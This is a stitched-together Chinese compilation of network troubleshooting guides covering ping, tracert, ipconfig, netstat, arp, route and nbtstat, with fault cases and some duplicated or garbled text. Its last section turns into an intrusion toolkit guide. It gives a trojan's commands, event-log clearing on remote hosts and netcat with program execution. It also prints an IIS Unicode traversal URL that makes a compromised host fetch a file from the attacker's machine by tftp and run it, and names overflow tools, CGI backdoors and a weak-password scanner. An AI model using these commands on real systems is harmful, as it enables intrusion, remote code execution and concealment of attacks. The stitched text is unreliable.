排除一些网络故障的常用命令
9个非常实用的网络调试命令,你会用几个呢?
9个⾮常实⽤的⽹络调试命令,你会⽤⼏个呢?1.ping 命令ping 是个使⽤频率极⾼的实⽤程序,主要⽤于确定⽹络的连通性。
这对确定⽹络是否正确连接,以及⽹络连接的状况⼗分有⽤。
简单的说,ping 就是⼀个测试程序,如果 ping 运⾏正确,⼤体上就可以排除⽹络访问层、⽹卡、Modem 的输⼊输出线路、电缆和路由器等存在的故障,从⽽缩⼩问题的范围。
ping 能够以毫秒为单位显⽰发送请求到返回应答之间的时间量。
如果应答时间短,表⽰数据报不必通过太多的路由器或⽹络,连接速度⽐较快。
ping 还能显⽰ TTL(Time To Live,⽣存时间)值,通过 TTL 值可以推算数据包通过了多少个路由器。
命令格式ping 主机名ping 域名ping IP 地址使⽤ ping 命令检查到 IP 地址的计算机的连通性,该例为连接正常。
共发送了四个测试数据包,正确接收到四个数据包。
ping 命令的基本应⽤⼀般情况下,⽤户可以通过使⽤⼀系列 ping 命令来查找问题出在什么地⽅,或检验⽹络运⾏的情况。
下⾯就给出⼀个典型的检测次序及对应的可能故障:① ping 127.0.0.1如果测试成功,表明⽹卡、TCP/IP 协议的安装、IP 地址、⼦⽹掩码的设置正常。
如果测试不成功,就表⽰ TCP/IP 的安装或设置存在有问题。
② ping 本机 IP 地址如果测试不成功,则表⽰本地配置或安装存在问题,应当对⽹络设备和通讯介质进⾏测试、检查并排除。
③ ping 局域⽹内其他 IP如果测试成功,表明本地⽹络中的⽹卡和载体运⾏正确。
但如果收到 0 个回送应答,那么表⽰⼦⽹掩码不正确或⽹卡配置错误或电缆系统有问题。
④ ping ⽹关 IP这个命令如果应答正确,表⽰局域⽹中的⽹关路由器正在运⾏并能够做出应答。
⑤ ping 远程 IP如果收到正确应答,表⽰成功的使⽤了缺省⽹关。
对于拨号上⽹⽤户则表⽰能够成功的访问 Internet(但不排除 ISP 的 DNS 会有问题)。
tracert和ipconfig命令的基本方法
一、概述在计算机网络中,tracert和ipconfig是两个常用的命令行工具,用于诊断网络问题、查看网络信息和排除故障。
它们可以帮助用户了解网络的运行状态、寻找网络中的问题和解决网络故障。
本文将介绍tracert和ipconfig命令的基本方法,包括命令的语法、参数用法和示例操作,帮助读者更好地掌握这两个工具的使用。
二、tracert命令1. tracert命令的语法tracert命令是Windows系统中用于跟踪数据包在网络上的传输路径的工具,其基本语法如下:tracert [目标主机] [参数]其中,目标主机表示要跟踪的目标网络位置区域,参数是可选的,用于指定命令的一些附加选项。
2. tracert命令的参数用法tracert命令的常用参数包括:-tr 显示每个路由的延迟时间-h 跳数设置数据包传输的最大跳数-j 列表设置数据包传输经过的路径-w 超时设置设置数据包传输的超时时间3. tracert命令的示例操作示例1:跟踪到目标主机xxxtracert xxx示例2:设置最大跳数为10tracert -h 10 xxx三、ipconfig命令1. ipconfig命令的语法ipconfig命令是Windows系统中用于显示和配置网络位置区域信息的工具,其基本语法如下:ipconfig [参数]ipconfig /all2. ipconfig命令的参数用法ipconfig命令的常用参数包括:/all 显示所有网络接口的详细信息/release 释放当前网络接口的IP位置区域/renew 更新当前网络接口的IP位置区域3. ipconfig命令的示例操作示例1:显示当前网络接口的IP位置区域信息ipconfig示例2:释放当前网络接口的IP位置区域ipconfig /release四、结论tracert和ipconfig是两个常用的命令行工具,用于网络故障排查和网络配置。
通过本文的介绍,相信读者已经了解了tracert和ipconfig 命令的基本方法和用法,希望本文可以帮助读者更好地掌握这两个工具,在实际的网络操作中更加熟练地使用它们。
网管常用的命令工具
解决过程:用测线仪测试交换机端的水晶头,发现6、7号线均有故障,更换交换机端的水晶头,测试8根线都正常了。以为问题解决了,谁知这时问题更大了,Ping服务器都不通。再查网络,始终查不出问题,这时另一工作站也报告连不上服务器了。重启交换机,问题依旧。检查服务器网络连接情况,发现双击服务器网络连接图标无反应,点击其它图标正常。原来,频繁的网络错误请求导致了服务器网络连接出错。重启服务器,所有工作站连接恢复正常。
[二]、网络故障实例
一、网络电缆故障
二、网卡与网络故障
三、集线器、交换机故障
四、路由器故障
五、ADSL故障
一、网络电缆故障
1.故障现象:某局域网为100Mbps以太网,共50台计算机,通过D-Linkl0/100Mbps交换机互连。现在需要通过服务器,为每台计算机统一安装应用软件。在进行网络拷贝时,发现传输速度很慢,甚至还不如10Mbps网快。
4.故障现象:移动用户不能正常登录,即使登陆成功,网络服务也时断时续。
解决过程:通过检查我们发现,用户使用笔记本电脑进行工作,连接笔记本电脑的电缆过长。用户每天都移动、弯曲、连接和切断网络终端。而廉价的电缆经受不起这种不断扭动,导致电缆接触不良。更换工作站连接电缆和损坏的连接器,故障排除。
可能:浏览器中安全设置过高,不允许写入cookie,不允许执行脚本之类。
查看:浏览器 中 工具 internet选项 安全
XP操作系统,SP2补丁包。不能从浏览器使用Ftp访问:
解决:浏览器 中 工具 internet选项 高级
浏览
(1)使用被动FTP 去掉钩
另一类逻辑故障就是一些重要进程或端口关闭, 以及系统的负载过高。比如线路中断,没有流量,用Ping发现线路端口不通,检查发现该端口处于Down的状态,这就说明该端口已经关闭,导致故障。这时只需重新启动该端口,就可以恢复线路的连通了。还有一种常见情况是路由器的负载过高,表现为路由器CPU温度太高、CPU利用率太高,以及内存剩余太少等,如果因此影响网络服务质量,最直接也是最好的办法就是更换路由器。
网络故障诊断几个常用命令
这里,对于lo0回送口的信息可以不管,但对于nat0没有不能传输的分组在等待,这是正常的。如果nat0口正在运行而有信息不能正常地传送到该网络,即queue字段不为零,就可怀疑通信电缆或网卡有问题。
B、输入错(ierrs)和输出错(oerrs)应该接近为零,最好全为零,这说明通过该接口传送的信息无出错的分组,网络的接口无问题。但当这两个字段有100个以上的出错分组时就可以认为是高出错率了。高的输出错表示本地网络饱和或在主机与网络之间有不良的物理连接。高的输入错表示网络饱和、本地主机过载或物理连接有问题,可以用ping命令统计误码率,进一步确定故障的程度。
C、如果网络管理员和用户的ping命令都失败了,这时可注意ping命令显示的出错信息,这种出错信息通常分为三种情况:
(1)unknown host(不知名主机),这种出错信息的意思是该远程主机的名字不能被命名服务器转换成ip地址。网络故障可能为命名服务器有故障,或者其名字不正确,或者网络管理员的系统与远程主机之间的通信线路有故障。
1、netstat命令
netstat程序有助于我们了解网络的整体使用情况。它可以显示当前正在活动的网络连接的详细信息,例如显示网络连接、路由表和网络接口信息,可以让用户得知目前总共有哪些网络连接正在运行。我们可以使用netstat/?命令来查看一下该命令的使用格式以及详细的参数说明,该命令的使用格式是在DOS命令提示符下或者直接在运行对话框中键入如下命令:netstat[参数],利用该程序提供的参数功能,我们可以了解该命令的其他功能信息,例如显示以太网的统计信息、显示所有协议的使用状态,这些协议包括TCP协议、UDP协议以及IP协议等,另外还可以选择特定的协议并查看其具体使用信息,还能显示所有主机的端口号以及当前主机的详细路由信息。
简单的ping命令来检测网络故障
简单的ping命令来检测网络故障简单的ping命令来检测网络故障我们在使用电脑的时候,经常会出现些小问题,今天,店铺就教大家几条简单的ping命令来检测网络故障。
操作步骤首先点击开始-运行,输入cmd,进入命令提示符窗口。
输入ping 127.0.0.1 ,127.0.0.1是本地环回IP地址,此命令用于检测本机上TCP/IP协议是否安装正确。
如果这都不通,那么重新安装TCP/IP协议。
输入ipconfig,查看电脑中所有网络连接的情况,包括IP地址,掩码,网关等一系列信息。
在上一步中几下电脑IP地址,子网掩码,以及网关地址。
然后输入ping 192.168.1.104,查看是否能ping通自己主机。
不通的话把网卡禁用后再重新启用。
输入ping 192.168.1.1 ,检查是否可以ping通网关地址。
检查是否和外网相通,即是否连到了互联网。
输入ping ,在命令行中可以看到百度返回的数据包状态,以及接收数据包的时间。
利用手机wifi连接电脑上网教程不知道手机的wifi功能怎么用?本教程介绍了手机wifi的设置过程,以及手机wifi连接电脑上网的方法。
家里面有无线路由的可以参照此教程。
Android手机WIFI设置带Wi-Fi无线上网功能的笔记本在工作、生活、学习中的应用已经相当普遍,它的方便性也得到了众人的认可。
而随着娱乐、商务便携化需求的提升,越来越多的手机开始内置Wi-Fi功能,这样手机也可以像迅驰笔记本那样轻松接入无线网络了。
在要求不是太高的情况下,用手机Wi-Fi上网实现,譬如收发邮件、上网查资料、QQ/MSN 通讯交流、看在线电影等应用都不是难事。
接下来我教你们如何设置Android手机WIFI。
1.首先在主菜单里面找到设置一项,然后打开设置点击无线和网络2.进入无线和网络后,打开WLAN会自动搜索信号,如果是在肯德基,麦当劳,德克士,星巴克这些有免费无线网络的场所直接可以连接。
3.加密的需要输入密码后才能连接4。
网络故障诊断的常用命令
配置不正确的IP地址或子网掩码是网络配置的常见故障 其中配置不正确的IP地址有两种情况: 1网段部分不正确;此时计算机由于和局域网并不处在同一个子网中;所以无法和局域网进行通信 2主机部分不正确;这时候很可能与另一主机配置的IP地址是相同的 这种故障只有当两台主机同时工作时才会出现;而且后联网的计算机将得不到在原先配置中的IP地址 只要其中一台主机的IP地址;该问题即能排除 当主机系统能到达远程主机但不能到达本地子网中的其他主机时;这表示子网掩码设置有问题;我们只需要修改子网掩码即可解决问题
5 /flushdns刷新和重置客户机解析程序缓存 6 使用/registerdns续订DNS客户注册 7 使用/displaydns显示和查看客户机解析程序缓存 8 在客户机上显示DHCP类别ID信息 9 在客户机上设置DHCP类别ID信息
Ipconfig/Winipcfg命令的使用
4 3 显示网络连接信息的Netstat命令
TTL是生存时间的意思;就是说这个ping的数据包能在网络上存在多少时间 当对网络上的主机进行ping操作的时候;本地机器会发出一个数据包;数据包经过一定数量的路由器传送到目的主机;但是由于很多的原因;一些数据包不能正常传送到目的主机;那如果不给这些数据包一个生存时间的话;这些数据包会一直在网络上传送;导致网络开销的增大 当数据包传送到一个路由器之后;TTL就自动减1;如果减到0了还是没有传送到目的主机;那么就自动丢失 默认情况下;Linux系统的TTL值为64或255;Windows NT/2000/XP系统的TTL值为128;Windows 98系统的TTL值为32;UNIX主机的TTL值为255 当不知道目的主机的操作系统的时候我们可以根据TTL来猜测;但是不一定100%准确;如果目的主机是windows;但是经过了比如75个路由器;那么TTL的返回值是12875=53;那么你可能认为这个目的主机是Linux系统;但是一般不会经过那么多的路由器;所以通过TTL来判断目的主机的操作系统还是有一定的依据的
常用网络诊断命令完整版
常用网络诊断命令HUA system office room 【HUA16H-TTMS2A-HUAS8Q8-HUAH1688】常用网络诊断命令(2007-03-17 21:36:11)* arp.exe -a获得主机的ARP列表,俺的只有网关。
如果用同一个网线查不同的设备,有时候需要清一下ARP表。
比如连接可网口管理的设备时,需要 arp -d * 清楚一下arp cache池。
Internet Address Physical Address Type10.13.23.97 00-00-0c-07-ac-2b dynamic* ipconfig.exe /all这个常用,不费话了。
常用参数还有 /release /renew看看我的:Ethernet adapter 无线网络连接 4:Connection-specific DNS Suffix . : Description . . . . . . . . . . . : ATMEL USB FastVNET (AR) #2Physical Address. . . . . . . . . : 00-06-F4-03-EF-B4DHCP Enabled. . . . . . . . . . . : YesAutoconfiguration Enabled . . . . : YesIP Address. . . . . . . . . . . . : 10.13.23.101Subnet Mask . . . . . . . . . . . : 255.255.255.224Default Gateway . . . . . . . . . : 10.13.23.97DHCP Server . . . . . . . . . . . : 10.13.20.19DNS Servers . . . . . . . . . . . : 202.106.0.20Primary WINS Server . . . . . . . : 10.13.20.18Lease Obtained. . . . . . . . . . : 2006年5月14日 22:36:09 Lease Expires . . . . . . . . . . : 2006年5月15日 2:36:09 * ipconfig.exe /displaydns给出一堆DNS,我的是:—————————————-Record Name . . . . . : Record Type . . . . . : 5Time To Live . . . . : 236Data Length . . . . . : 4Section . . . . . . . : AnswerCNAME Record . . . . : —————————————-Record Name . . . . . : Record Type . . . . . : 1Time To Live . . . . : 3170Data Length . . . . . : 4Section . . . . . . . : AnswerA (Host) Record . . . : 222.208.183.30 —————————————-Record Name . . . . . : Record Type . . . . . : 1Time To Live . . . . : 72747Data Length . . . . . : 4Section . . . . . . . : AnswerA (Host) Record . . . : 219.133.40.157Record Name . . . . . : Record Type . . . . . : 1Time To Live . . . . : 72747Data Length . . . . . : 4Section . . . . . . . : AnswerA (Host) Record . . . : 219.133.40.156* route.exe print打印路由表,同 netstat -r* net.exe start察看windows启动的所有服务,看看,还是不少啊~: AlerterApplication Layer Gateway ServiceAutomatic UpdatesBackground Intelligent Transfer Service COM+ Event SystemComputer BrowserCryptographic ServicesDCOM Server Process LauncherDHCP ClientDNS ClientEvent LogIPSEC ServicesLogical Disk ManagerNetwork ConnectionsNetwork Location Awareness (NLA)NVIDIA Display Driver ServicePlug and PlayPrint SpoolerProtected StorageRemote Access Connection ManagerRemote Procedure Call (RPC)Remote RegistrySecurity Accounts ManagerServerShell Hardware DetectionSystem Event NotificationTelephonyWindows AudioWindows Firewall/Internet Connection Sharing (ICS)Windows GatewayWindows Image Acquisition (WIA)Windows Management InstrumentationWorkstation* netstat.exe -e察看网络端口的通讯状态,可以看到丢弃和错误的包数,还有广播包数,凭此能确定是否中毒。
网络故障诊断命令及用法
netstat命令的主要参数及功能描述如下:
-a:显示所有连接和侦听端口。
-e:显示以太网统计信息。
-n:在数字表里显示地址和端口号。
-p proto:显示通过proto参数指定的协议的连接,proto参数可以是TCP、UDP或IP协议。
Ping命令的主要参数及功能描述如下:
-t :校验与指定计算机的连接,直到用户中断。
-a :将地址解析为计算机名。
-n count :发送由count 指定数量的ECHO报文,默认值为 4.
-l length :发送包含由length 指定数据长度的ECHO报文。默认值为 64 字节,最大值为 8192 字节。
NBTStat命令主要参数及功能描述如下:
-a: 使用这个参数,只要知道远程主机的机器名称,就可以得到它的NETBIOS信息。
-A:这个参数也可以得到远程主机的NETBIOS信息,但需要知道远程主机IP地址。
-n:列出本地机器的NETBIOS信息。
在网络管理维护中可以用的命令很多,上面只是介绍几种比较常见的,其他的一些命令的使用大家可以参考微软相关帮助手册。
tracert 命令主要参数及功能描述如下:
-d:该参数将返回到达 IP 地址所经过的路由器列表。通过使用 -d 参数,可以更快地显示路由器路径,因为 tracert 不会尝试解析路径中路由器的名称。
-h maximum_hops:指定搜索到目标地址的最大跳跃数。
-r:显示路由表信息。
-s:显示指定协议统计信息。
4.arp(地址转换协议)命令
arp实际上是一个TCP/IP协议,主要用于确定对应IP地址的网卡物理地址。使用arp命令,能够查看到本地计算机或另一台计算机的ARP高速缓存中的内容。按照缺省设置,ARP高速缓存中的项目是动态的,每当发送一个指定地点的数据报且高速缓存中不存在当前项目时,ARP便会自动添加该项目。一旦高速缓存的项目被输入,它们就已经开始走向失效状态。例如,在Windows NT/2000网络中,如果输入项目后不进一步使用,物理IP地址对就会在2至10分钟内失效。因此,如果ARP高速缓存中项目很少或根本没有时,请不要奇怪,通过另一台计算机或路由器的ping命令即可添加。
网络故障处理有哪些常用、实用的命令?
网络故障处理有哪些常用、实用的命令?01ping说到DOS的经典命令,怎么能不提耳熟能详,大名鼎鼎的ping 命令。
ping命令是用来检查网络是否通畅或者网络连接速度的命令,也被称为第一个必须掌握的DOS命令。
ping命令的原理是啥?你看啊,网络上的机器都有唯一确定的IP地址,这时候,你给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包。
根据返回的数据包,你可以确定目标主机的存在,可以初步判断目标主机的操作系统。
ping命令的日常操作:01 用于检测计算机的网络状况输入ping 可以查询自己和百度网站之间的数据传输情况查找自己的网关:输入ipconfig命令,例如自己的网关为192.168.127.1,那么输入ping -t 192.168.127.1 不停的发送数据包,会得到自己网关的实时数据,ctrl+c可以暴力停止。
输入ping -n 2 192.168.127.1得到正在 Ping 192.168.127.1 具有 32 字节的数据:来自 192.168.127.1 的回复: 字节=32 时间<1ms TTL=64来自 192.168.127.1 的回复: 字节=32 时间<1ms TTL=64192.168.127.1 的 Ping 统计信息:数据包: 已发送 = 2,已接收 = 2,丢失 = 0 (0% 丢失),往返行程的估计时间(以毫秒为单位):最短 = 0ms,最长 = 0ms,平均 = 0ms;会发送两个数据包,并得到传输时间。
输入ping -l 64 192.168.127.1指发送64字节的数据包,穿输到192.168.127.1输入ping -a 192.168.127.1可以帮助你解析主机名称,例如我的名称为LAPTOP-F92H8T1H 得到主机名称也可以输入hostname,得到LAPTOP-F92H8T1H02 判断计算机网络故障网络故障的原因:TCP/IP协议或配置出错、物理故障、中毒ping localhost 或者 ping 255.0.0.0(网关),如果出现回复,则网络协议正常。
局域网组建中的网络故障排查方法
局域网组建中的网络故障排查方法在局域网组建过程中,网络故障是经常会遇到的问题之一。
当局域网中的设备无法正常通信或连接到互联网时,我们需要采取一系列的排查方法来解决问题。
本文将介绍一些常见的网络故障排查方法,帮助您快速定位和解决问题。
1. 确认物理连接网络故障的第一步是确认物理连接是否正常。
检查所有网络设备(如路由器、交换机、网线等)的电源是否正常连接,指示灯是否亮起。
同时,确保网线插头端口没有松动或损坏,并尽量使用正版和优质的网线。
2. 检查IP地址配置网络设备的IP地址配置错误是常见的故障原因之一。
在开始排查前,请确保每个设备的IP地址、子网掩码和网关设置是正确的。
可以通过检查网络设备的操作手册或联系网络管理员获取正确的IP地址配置。
3. 重启设备经常,重启设备可以解决一些轻微的网络故障。
尝试关闭并重新启动所有受影响的设备,包括路由器、交换机和终端设备,以清除任何临时错误或冲突。
4. 使用Ping命令检查连通性Ping命令是网络故障排查中常用的工具之一。
它可以通过发送数据包到指定的IP地址来检查网络设备之间的连通性。
在命令提示符或终端中输入“ping”加目标设备的IP地址,然后观察返回的结果。
如果返回的结果显示回复时间过长、丢包或请求超时,则可能存在网络故障。
5. 检查DNS配置如果您无法通过访问域名来访问互联网,可能是DNS配置问题导致的。
检查网络设备的DNS服务器配置是否正确,并尝试更改为其他公共DNS服务器(如Google DNS或OpenDNS)来解决问题。
6. 检查防火墙设置防火墙是保护网络安全的重要组成部分,但有时也会阻止网络设备之间的通信。
检查网络设备的防火墙设置,确保允许所需的端口和传入/传出流量通过。
7. 使用网络监控工具如果以上方法无法解决网络故障,可以考虑使用网络监控工具来帮助排查问题。
网络监控工具可以实时监测网络设备的状态、流量和连接,并提供详细的故障诊断报告。
一些常见的网络监控工具包括Wireshark、PingPlotter等。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
一、ping网管使用最频的当是ping命令,它不仅可以检查网络是否连通,还有益于分析判断网络故障。
其常用方法有:1. ping本机IP本机始终都是应该对该ping命令作出应答,如没有,则表示本地配置或安装存在问题。
出现此问题时,局域网用户可断开网缆,然后重新发送该命令:如果网线断开后本命令正确,则表示另一机子可能配置了相同的IP地址。
这里显示的TTL(Time T o Live存在时间),表示数据包已通过的路由器数量。
2. ping网关IP命令应答如果正确,表示局域网中的网关路由器正在正常运行3. ping远程IP如果收到4个应答,表示成功的使用了缺省网关。
对于拨号上网用户则表示能够成功的访问Internet(但不排除ISP的DNS会有问题)。
4. ping局域网内其他IP该命令将会经过网卡及网缆到达其他机器后再返回。
收到回送应答表明本地网络中的网卡和载体运行正确;但若收到0个回送应答,那么表示子网掩码(进行子网分割时,将IP地址的网络部分与主机部分分开的代码)不正确或网卡配置错误或电缆系统有问题。
5. ping localhostlocalhost是系统的网络保留名,它是127.0.0.1的别名,每台机器都能将该名字转换成该地址。
6. ping (如)对这个域名执行Ping 地址,通常是通过DNS服务器。
如果出现故障,则表示DNS服务器的IP地址配置不正确或DNS服务器有故障。
简言之,如果ping运行正确,我们大体上就可以排除网络访问层、网卡、Modem 的输入输出线路、电缆和路由器等存在的故障,从而减小了问题的范围。
但由于可以自定义所发数据报的大小及无休止的告诉发送,ping也被某些别有用心的人作为DDOS(拒绝服务攻击)的工具,例如许多大型的网站就是被黑客利用数百台可以告诉介入互联网的电脑连续发送大量ping数据报而瘫痪的。
二、NetstatNetstat用于显示与IP、TCP、UDP和ICMP协议相关的统计数据,一般用于检验本机各端口的网络连接情况。
1. netstat-s :本命令能按照各协议分别显示其统计数据。
如果我们的应用程序或浏览器运行速度较慢,或者不能显示Web页之类的数据,那么我们就可以用本选项来查看所显示的信息。
2. netstat-e :用于显示以太网统计数据。
它列出了发送和接收端的数据报数量,包括传送的数据报的总字节数、错误数、删除数、数据报的数量和广播的数量,可用来统计基本的网流量。
3. netstat-r :可显示路由表信息4. netstat-a :显示所有有效连接信息列表,包括已建立连接(ESTABLISHED)与监听连接请求(LISTENING)的连接。
三、IPConfigIPConfig用于显示当前TCP/IP配置。
如果我们的机子和所在局域网使用了动态主机配置协议(DHCP),这时IPConfig可以让我们了解自己的计算机是否成功的租用到一个IP地址,如果租用到则可以了解它目前分配到的是什么地址。
了解机器当前IP地址、子网掩码和缺省网关实际上有利于测试和分析故障。
1. ipconfig :它显示每个已经配置的接口的IP地址、子网掩码和缺省网关值。
2. ipconfig/all :当使用all选项时,IPConfig能为DNS和WINS服务器显示它已经配置且所要使用的附加信息(如IP地址等),并且显示内置于本地网卡中的物理地址(MAC)。
四、ARPARP(地址转换协议)是一个重要的TCP/IP协议,用于确定对应IP地址的网卡物理地址。
ARP命令能够查看本地或另一台计算机的ARP高速缓存中的当前内容。
1. arp-a或arp-g :用于查看高速缓存中的所有项目。
2. arp-a IP :如果我们有多个网卡,那么使用arp-a加上接口的IP地址,就可以只显示与该接口相关的ARP缓存项目。
五、Tracert如果网络连通有问题,可用tracert检查到达的目标IP地址的路径并记录结果。
Tracert的使用很简单,只需要再Tracert后面跟一个IP地址或URL,Tracert 一般用来检测故障的位置,我们可以用“tracert IP”确定在哪个环节上出了问题。
六、Route大多数主机一般都是驻留在只连接一台路由器的网段上。
由于只有一台路由器,一次不存在使用哪一台路由器将数据报发表到远程计算机的问题,该路由器的IP 地址可作为该网段上所有计算机的缺省网关输入。
但是,当网络上拥有两个或多个路由器时,我们就不一定想只依赖缺省网关了。
实际上我们可能想让我们的某些远程IP地址通过某个特定的路由器来传递,而其他的远程IP则通过另一个路由器来传递。
Route print命令用于显示路由表中的当前项目,在单路由器网段上的输出。
七、NBTStat本命令可释放和刷新NetBIOS名称。
运用NetBIOS,我们可以查看本地计算机或远程计算机上的NetBIOS名字表格。
1. nbtstat-n :显示寄存在本地的名字和服务程序。
2. nbtstat-c :用于显示NetBIOS名字高速缓存的内容。
NetBIOS名字高速缓存用于存放与本计算机最近进行通信的其他计算机的NetBIOS名字和IP地址对。
3. nbtstat-r :用于清除和重新加载NetBIOS名字高速缓存。
4. nbtstat-a IP :通过IP显示另一台计算机的物理地址和名字列表,我们所显示的内容就像对方计算机自己运行nbtstat-n一样。
5. nbtstat-s IP :显示使用其IP地址的另一台计算机的NetBIOS连接表。
八、设置共享的命令1. net share 查看机器的共享资源。
2. 手工删除共享Net share c$ /dNet share d$ /dNet share ipc$ /dNet share admin$ /d3.增加一个共享C:net share mymovie=e:downloadsmovie/users:l增加mymovie共享,同时限制链接用户数为1人。
一、netsvc.exe下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:netsvc /list \\IP地址netsvc schedule \\IP地址/querynetsvc \\IP地址schedule /start二、OpenT elnet.exe远程启动主机的T elnet服务,并绑定端口到7878,例如:OpenT elnet \\IP地址用户名密码1 7878然后就可以telnet到主机的7878端口,进入DOS方式下:telnet IP地址7878三、winshell.exe一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:p Path (查看winshell主程序的路径信息)b reBoot (重新启动机器)d shutDown (关闭机器)s Shell (执行后你就会看到可爱的“C:\>”)x eXit (退出本次登录会话,此命令并不终止winshell的运行)CMD> http://.../srv.exe(通过http下载其他网站上的文件到运行winshell的机器上)四、3389登陆器,GUI方式登录远程主机的五、elsave.exe事件日志清除工具elsave -s \\IP地址-l application -Celsave -s \\IP地址-l system -Celsave -s \\IP地址-l security -C执行后成功清除应用程序日志,系统日志,安全日志六、hbulot.exe开启win2kserver和winxp的3389服务hbulot [/r]使用/r表示安装完成后自动重起目标使设置生效。
七、nc.exe(netcat.exe)一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
想要连接到某处: nc [-options] hostname port[s] [ports] ...绑定端口等待连接: nc -l -p port [-options] [hostname] [port]参数:-e prog 程序重定向,一旦连接,就执行[危险!!]-g gateway source-routing hop point[s], up to 8-G num source-routing pointer: 4, 8, 12, ...-h 帮助信息-i secs 延时的间隔-l 监听模式,用于入站连接-n 指定数字的IP地址,不能用hostname-o file 记录16进制的传输-p port 本地端口号-r 任意指定本地及远程端口-s addr 本地源地址-u UDP模式-v 详细输出——用两个-v可得到更详细的内容-w secs timeout的时间-z 将输入输出关掉——用于扫描时八、TFTPD32.EXE把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:http://IP地址/s cripts/..%5c..%5c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址get 文件名c:\winnt\system32\文件名然后可以直接令文件运行:http://IP地址/s cripts/..%5c..%5c/winnt/system32/cmd.exe?/c 文件名九、prihack.exe是IIS的printer远程缓冲区溢出工具。
idqover.exe是溢出idq 的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。
xploit.exe是一个图形界面的ida 溢出,成功以后winxp下需要打winxp。
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin 目录下,asp放到有ASP执行权限的目录。
然后用IE浏览器连接。
一、一Xscan命令行运行参数说明:在检测过程中,按[空格]键可以查看各线程状态及扫描进度,按q键保存当前数据后提前退出程序,按<ctrl c>强行关闭程序。
1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]xscan -file <主机列表文件名> <检测项目> [其他选项]其中<检测项目> 含义如下:-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的PORT-SCAN-OPTIONS\PORT-LIST项定制待检测端口列表);-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的CGI-ENCODE\encode_type 项设置编码方案);-iis : 检测IIS漏洞(可通过\dat\config.ini文件的CGI-ENCODE\encode_type项设置编码方案);[其他选项] 含义如下:-v: 显示详细扫描进度-p: 跳过Ping不通的主机-o: 跳过没有检测到开放端口的主机-t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10。